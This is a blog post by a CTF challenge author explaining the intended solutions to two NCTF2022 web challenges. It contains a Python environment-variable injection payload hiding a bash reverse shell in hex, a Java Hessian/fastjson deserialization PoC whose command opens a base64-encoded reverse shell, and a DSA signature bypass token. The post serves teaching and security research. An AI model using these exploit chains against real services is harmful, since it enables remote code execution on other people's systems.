

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.svg">
  <link rel="icon" href="/img/favicon.svg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#17354a">
  <meta name="author" content="Pupi1">
  <meta name="keywords" content="Security Research,Java Security,AI Security,CTF">
  
    <meta name="description" content="NCTF2022前言这次的NCTF2022，终于结束了，这次放出的题都是我研究很久的题目，希望各位师傅没有失望。最后题目一个一解，一个0解（不过有师傅赛后做出来了orz">
<meta property="og:type" content="article">
<meta property="og:title" content="NCTF2022-出题小记">
<meta property="og:url" content="https://pupil857.github.io/2022/12/08/NCTF2022-%E5%87%BA%E9%A2%98%E5%B0%8F%E8%AE%B0/">
<meta property="og:site_name" content="Pupi1&#39;s Blog">
<meta property="og:description" content="NCTF2022前言这次的NCTF2022，终于结束了，这次放出的题都是我研究很久的题目，希望各位师傅没有失望。最后题目一个一解，一个0解（不过有师傅赛后做出来了orz">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/1.PNG">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/22.PNG">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/2.PNG">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/3.PNG">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/6.png">
<meta property="article:published_time" content="2022-12-08T09:00:55.000Z">
<meta property="article:modified_time" content="2026-03-24T16:53:34.075Z">
<meta property="article:author" content="Pupi1">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="X1cT34m">
<meta property="article:tag" content="NJUPT">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/pupil857/poto/main/img/1.PNG">
  
  
  
  <title>NCTF2022-出题小记 | Pupi1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"pupil857.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 55vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Pupi1</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>链接</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/links/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-link-fill"></i>
                  <span>链接</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/site-hero-post.svg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.15)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="NCTF2022-出题小记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-12-08 17:00" pubdate>
          2022-12-08 17:00
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">NCTF2022-出题小记</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="NCTF2022">NCTF2022</h1><h3 id="前言">前言</h3><p>这次的NCTF2022，终于结束了，这次放出的题都是我研究很久的题目，希望各位师傅没有失望。最后题目一个一解，一个0解（不过有师傅赛后做出来了orz</p>

<span id="more"></span>

<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/1.PNG" srcset="/img/loading.gif" lazyload/></p>
<p>题目环境最后都会放到github，给各位师傅复现 <a href="https://github.com/X1cT34m/NCTF2022" rel="noopener" target="_blank">https://github.com/X1cT34m/NCTF2022</a></p>
<h3 id="calc">calc</h3><p>这个题，出的很久远了，在上半年的时候这个题就出完了。师傅们都可以在网上搜到由su出题的那次dasctf三月赛，可以看到题目源码是差不多的。当时是被非预期了(<del>虽然这次也被非预期了</del>师傅们太强了)</p>
<p>由于我比较懒，我当时就看到用反引号和注释绕过的，这次上的版本也是就把这2个点过滤了。dockerfile也是用的之前的<del>所以环境的flag都没改</del>所以又被非预期了。</p>
<p>所以在被非预期后直接就上了一个没有可控点的修复版本。</p>
<h5 id="预期">预期</h5><p>这个题是在p神写了那篇环境注入的<a href="https://tttang.com/archive/1450/" rel="noopener" target="_blank">文章</a>后不久发现的一个利用。当时仔细想了一下其他语言中是否也存在这样的问题，有没有可能也造成rce。在看完python3的system具体实现后发现最后调用的位置，也是通过<code>/bin/sh -c</code>去执行的命令</p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/22.PNG" srcset="/img/loading.gif" lazyload/></p>
<p>这里完全是可以通过设置环境变量来造成rce的。那么现在的重点就是如何去设置环境变量。因为当前的环境变量在python是直接作为一个字典来储存的，如果我们可以覆盖或者直接赋值的话那么就可以直接达成我们攻击目标。然后我们google一下就可以发现已经有前人发现了这种黑魔法<a href="https://aluvion.github.io/2019/05/02/Python%E9%BB%91%E9%AD%94%E6%B3%95-%E7%BB%95%E8%BF%87%E7%A9%BA%E6%A0%BC%E5%AE%9E%E7%8E%B0%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/" rel="noopener" target="_blank">链接</a></p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/2.PNG" srcset="/img/loading.gif" lazyload/></p>
<p>当我们在本地测试的时候却发现使用list生成器和中括号的这种方法无法像他写这样，成功覆盖变量（这里我也觉得很奇怪，我很明确的知道在我刚出这个题的时候这种方法是可以直接覆盖这样的变量的，不知道为什么突然不行了，知道的师傅可以和我交流一下）但是这种遍历赋值的方式对于字典的处理上不太一样，可以直接覆盖指定key的值,所以在对于我们的目标,覆盖os.environ是完全可行的</p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/3.PNG" srcset="/img/loading.gif" lazyload/></p>
<p>可以看到是成功添加了一个新的环境变量。</p>
<p>那现在我们的目标就转变为如何绕过关键字去设置我们的环境变量</p>
<p>即设置<code>os.environ['BASH_FUNC_echo%%']='() &#123; id; &#125;'</code></p>
<p>转化为payload就是<code>[[str][0]for[os.environ['BASH_FUNC_echo%%']]in[['() &#123; id; &#125;']]]</code>我们可以回顾一下python的ssti相关绕过的知识，只要是字符串通过引号包裹的都可以通过16进制去绕过关键词的检测，所以我们只需要把后面引号中的字符全部16进制编码就好。</p>
<p>接下来的关键点就是在于如何绕过os的waf，这个关键词没有引号包裹无法用进制去绕过。</p>
<p>但实际上python是支持Non-ASCII Identifies也就是说可以使用unicode字符的，具体参考见: <a href="https://peps.python.org/pep-3131/" rel="noopener" target="_blank">https://peps.python.org/pep-3131/</a> ，也就是说如果我们使用了UTF-8中的非ASCII码作为标识符，那么其会被函数转换为NFKC标准格式，也就是说我们可以使用例如<code>ᵒ</code>来代替<code>o</code>，从而绕过限制。所以在全部的碎片都被我们找到后我们就可以拼出这题的exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br/></pre></td><td class="code"><pre><span class="line">[[str][0]for[ᵒs.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x78\x2e\x78\x78\x2e\x78\x78\x2e\x78\x78\x2f\x78\x78\x78\x78\x20\x30\x3e\x26\x31\x3b\x7d']]]</span><br/></pre></td></tr></table></figure>
<p>就是这么短短的一行就可以解决掉这个题目了。</p>
<h5 id="非预期">非预期</h5><p>当时加这个可控点是因为想迷惑师傅们一手，我觉得题目有点简单了，<del>怕被秒</del></p>
<p>就先让师傅们绕一下错误的方向，结果师傅们太强了直接绕穿了。</p>
<p>其实非预期也就是几个问题，如何在eval不报错的情况下把命令传到system中去执行，然后就是如何带出回显。看到师傅们的做法都是通过回车分割命令，用python多行字符串去绕过eval的报错。然后因为是出网环境，操作的方法有很多这里我就不具体说了。可以去看其他师傅的wp。（因为不小心开了debug页面，我发现居然有师傅绕了一大圈读完文件去算pin的Orz</p>
<h3 id="EzJava">EzJava</h3><p>这个题是在最近很多比赛都开始出现rpc的反序列化时，我研究了一下hessian的反序列化，然后在只依赖dubbo的情况下发现的一条利用链，链其实很短。不知道师傅们没做出来时卡在哪步了。（当时出完的时间也比较早，一开始也是利用畸形数据直接到toString的，结果发现0ctf直接onlyjdk啦，然后就又再重新看了一遍才有现在这个版本）</p>
<p>这个题的核心问题就是单dubbo下的反序列化利用，其实在最近几个考hessian的题目中我们已经很明确的知道了，在hessian下如果可以触发<code>toString</code>那么整个利用链是可以直接串起来的。后续利用就如0ctf2022的那道hessian onlyjdk一样。当时的利用都是通过利用hessian的那个cve去触发toString的。那么我们不利用这个cve也可以触发toString么。</p>
<p>其实是可以的，我们去回顾hessian的利用链，其实都直接是通过反序列化XString去触发toSting再和其他的依赖中的链拼起来。（其实也就是喜闻乐见的拼链子）</p>
<p>hessian反序列化中以equals作为起点，通过<code>com.sun.org.apache.xpath.internal.objects.Xstring</code>的equals触发任意类的toString。</p>
<p>众所周知，fastjson的toString是可以触发任意的getter的。那么这个链其实已经很明显了。现在差一个sink点。因为hessian是有默认黑名单的。大部分可以利用的依赖都在里面。然后我们观察到最近爆出了有个hessian的cve，diff版本改动的时候可以看到黑名单新增了很多类，就<code>sun.print.</code>是存在于jdk中的。我们就可以在这个里面找到这次的利用类unixPrintServiceLookup（其实这个类的利用网上已经有相应的资料了的，但其实大多资料都有些错误，需要自己去debug排错才能正确利用）而这个类只存在于linux中，对于大部分还是win的我们极其不友好。<del>我当时为了调试这玩意专门弄了个虚拟机装了idea</del> 而且调试这个类也有坑要踩。</p>
<p>关键点在中的第一个if处</p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/4.png" srcset="/img/loading.gif" lazyload/></p>
<p>我们需要进入这个if去触发红框中的方法，在jdk中这里的这些类都是和打印机相关的一些服务，这里这个if会判断打印服务有没有启动，启动了就直接执行连接，没有就会调用下面的逻辑去启动服务，才会有我们注入命令的可能。</p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/5.png" srcset="/img/loading.gif" lazyload/></p>
<p>可以看到如果连接成功就会返回true。经过我的测试，在mac，ubuntu中我们这种自用的电脑都大概率存在这个服务。会出现无法rce的情况，而服务器类特别是docker，不存在这样的服务所以就可以打通。poc基于ysomap</p>
<p>poc：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/><span class="line">25</span><br/><span class="line">26</span><br/><span class="line">27</span><br/><span class="line">28</span><br/><span class="line">29</span><br/><span class="line">30</span><br/><span class="line">31</span><br/><span class="line">32</span><br/><span class="line">33</span><br/><span class="line">34</span><br/><span class="line">35</span><br/><span class="line">36</span><br/><span class="line">37</span><br/><span class="line">38</span><br/><span class="line">39</span><br/><span class="line">40</span><br/><span class="line">41</span><br/><span class="line">42</span><br/><span class="line">43</span><br/></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> HashMap <span class="title">makeMap</span> <span class="params">( Object v1, Object v2 )</span> <span class="keyword">throws</span> Exception</span>{  </span><br/><span class="line">    HashMap s = <span class="keyword">new</span> HashMap();  </span><br/><span class="line">    Tools.setFieldValue(s, <span class="string">"size"</span>, <span class="number">2</span>);  </span><br/><span class="line">    Class nodeC;  </span><br/><span class="line">    <span class="keyword">try</span> {  </span><br/><span class="line">        nodeC = Class.forName(<span class="string">"java.util.HashMap$Node"</span>);  </span><br/><span class="line">    }  </span><br/><span class="line">    <span class="keyword">catch</span> ( ClassNotFoundException e ) {  </span><br/><span class="line">        nodeC = Class.forName(<span class="string">"java.util.HashMap$Entry"</span>);  </span><br/><span class="line">    }  </span><br/><span class="line">    Constructor nodeCons = nodeC.getDeclaredConstructor(<span class="keyword">int</span>.class, Object.class, Object.class, nodeC);  </span><br/><span class="line">    nodeCons.setAccessible(<span class="keyword">true</span>);  </span><br/><span class="line">  </span><br/><span class="line">    Object tbl = Array.newInstance(nodeC, <span class="number">2</span>);  </span><br/><span class="line">    Array.set(tbl, <span class="number">0</span>, nodeCons.newInstance(<span class="number">0</span>, v1, v1, <span class="keyword">null</span>));  </span><br/><span class="line">    Array.set(tbl, <span class="number">1</span>, nodeCons.newInstance(<span class="number">0</span>, v2, v2, <span class="keyword">null</span>));  </span><br/><span class="line">    Tools.setFieldValue(s, <span class="string">"table"</span>, tbl);  </span><br/><span class="line">    <span class="keyword">return</span> s;  </span><br/><span class="line">}</span><br/><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br/><span class="line">Field theUnsafe = Unsafe.class.getDeclaredField(<span class="string">"theUnsafe"</span>);</span><br/><span class="line">        theUnsafe.setAccessible(<span class="keyword">true</span>);</span><br/><span class="line">        Unsafe unsafe = (Unsafe) theUnsafe.get(<span class="keyword">null</span>);</span><br/><span class="line">        Object unixPrintServiceLookup = unsafe.allocateInstance(UnixPrintServiceLookup.class);</span><br/><span class="line">        Tools.setFieldValue(unixPrintServiceLookup, <span class="string">"cmdIndex"</span>, <span class="number">0</span>);</span><br/><span class="line">        Tools.setFieldValue(unixPrintServiceLookup, <span class="string">"osname"</span>, <span class="string">"Pupi1"</span>);</span><br/><span class="line">        String cmd = <span class="string">";bash -c '{echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4L3h4eDwmMQo=}|{base64,-d}|{bash,-i}'"</span>;</span><br/><span class="line">        Tools.setFieldValue(unixPrintServiceLookup, <span class="string">"lpcFirstCom"</span>, <span class="keyword">new</span> String[]{cmd, cmd, cmd});</span><br/><span class="line"></span><br/><span class="line">        JSONObject jsonObject = <span class="keyword">new</span> JSONObject();</span><br/><span class="line">        jsonObject.put(<span class="string">"Pupi1"</span>,unixPrintServiceLookup);</span><br/><span class="line"></span><br/><span class="line">        XString xString = <span class="keyword">new</span> XString(<span class="string">"Pupi1"</span>);</span><br/><span class="line">        HashMap map1 = <span class="keyword">new</span> HashMap();</span><br/><span class="line">        HashMap map2 = <span class="keyword">new</span> HashMap();</span><br/><span class="line">        map1.put(<span class="string">"yy"</span>,jsonObject);</span><br/><span class="line">        map1.put(<span class="string">"zZ"</span>,xString);</span><br/><span class="line">        map2.put(<span class="string">"yy"</span>,xString);</span><br/><span class="line">        map2.put(<span class="string">"zZ"</span>,jsonObject);</span><br/><span class="line">        </span><br/><span class="line">        Object o = makeMap(map1,map2);</span><br/><span class="line">        doPOST(Hessian2Serializer.serialize(o));</span><br/><span class="line">}</span><br/></pre></td></tr></table></figure>
<p>其实应该还有很多类都可以触发任意toString而且hessian不要求继承序列化，可以选择的面就更宽了。更多的就留给感兴趣的师傅们去挖掘了。</p>
<p>然后就是前面的验证签名部分。当时把后面出完感觉有点不太够，加个验证什么的要充实一点。正好看到了CVE-2022-21449这个，想着有没有差不多漏洞原理的漏洞可以利用一下，然后这个cve是jdk高版本才存在的，对于jdk8来说是没有的。所以我就问了一下我们的密码手，然后在网上随便拉了一个dsa签名的java实现作为签名，结果正好啊，这段代码也没有验证特殊数值，直接进行的验签。导致了我们使用1，0可以绕过整个的验签过程，随意伪造token的值。</p>
<p><img alt="img" src="https://raw.githubusercontent.com/pupil857/poto/main/img/6.png" srcset="/img/loading.gif" lazyload/></p>
<p>这里的r和s没有进行验证，就会导致这样的问题。然后下面的hash碰撞也没有什么好说的了，这里直接给出一个hash相同的字符串<code>WelComeToNCTF200p</code> 用<code>eyJBbGliYW5hbmEiOiJXZWxDb21lVG9OQ1RGMjAwcCIsImlzcyI6IlB1cGkxIn0=.1.0</code>这个token解可以直接绕过验证啦，然后把整个流程串起来，直接反弹shell就可以解出这个题了</p>
<p>调用栈：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/><span class="line">25</span><br/><span class="line">26</span><br/><span class="line">27</span><br/><span class="line">28</span><br/><span class="line">29</span><br/><span class="line">30</span><br/><span class="line">31</span><br/><span class="line">32</span><br/><span class="line">33</span><br/><span class="line">34</span><br/><span class="line">35</span><br/></pre></td><td class="code"><pre><span class="line">getAllPrinterNamesBSD:554, UnixPrintServiceLookup (sun.print)</span><br/><span class="line"></span><br/><span class="line">refreshServices:282, UnixPrintServiceLookup (sun.print)</span><br/><span class="line"></span><br/><span class="line">getPrintServices:233, UnixPrintServiceLookup (sun.print)</span><br/><span class="line"></span><br/><span class="line">write:-1, ASMSerializer_1_UnixPrintServiceLookup (com.alibaba.fastjson.serializer)</span><br/><span class="line"></span><br/><span class="line">write:271, MapSerializer (com.alibaba.fastjson.serializer)</span><br/><span class="line"></span><br/><span class="line">write:44, MapSerializer (com.alibaba.fastjson.serializer)</span><br/><span class="line"></span><br/><span class="line">write:312, JSONSerializer (com.alibaba.fastjson.serializer)</span><br/><span class="line"></span><br/><span class="line">toJSONString:1077, JSON (com.alibaba.fastjson)</span><br/><span class="line"></span><br/><span class="line">toString:1071, JSON (com.alibaba.fastjson)</span><br/><span class="line"></span><br/><span class="line">equals:392, XString (com.sun.org.apache.xpath.internal.objects)</span><br/><span class="line"></span><br/><span class="line">equals:495, AbstractMap (java.util)</span><br/><span class="line"></span><br/><span class="line">putVal:635, HashMap (java.util)</span><br/><span class="line"></span><br/><span class="line">put:612, HashMap (java.util)</span><br/><span class="line"></span><br/><span class="line">doReadMap:145, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br/><span class="line"></span><br/><span class="line">readMap:126, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br/><span class="line"></span><br/><span class="line">readObject:2733, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br/><span class="line"></span><br/><span class="line">readObject:2308, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br/><span class="line"></span><br/><span class="line">starter:39, IndexController (com.example.ctf)</span><br/></pre></td></tr></table></figure>
<h3 id="后记">后记</h3><p>总之在比赛中看到各位师傅做自己的题，能和各位师傅交流技术还是很开心的，这才是我心目中CTF应该有的模样。也希望师傅们明年还能来捧场，虽然不知道我还会不会出题了。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/Web/" class="print-no-link">#Web</a>
      
        <a href="/tags/X1cT34m/" class="print-no-link">#X1cT34m</a>
      
        <a href="/tags/NJUPT/" class="print-no-link">#NJUPT</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/03/16/Dubbo-CVE-2023-23638/" title="Dubbo-CVE-2023-23638">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Dubbo-CVE-2023-23638</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/09/03/%E9%9D%92%E9%BE%99%E7%BB%84BadBean/" title="青龙组BadBean">
                        <span class="hidden-mobile">青龙组BadBean</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <span>© Pupi1</span> <span class="mx-1">|</span> <span>Built with Hexo and Fluid</span> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
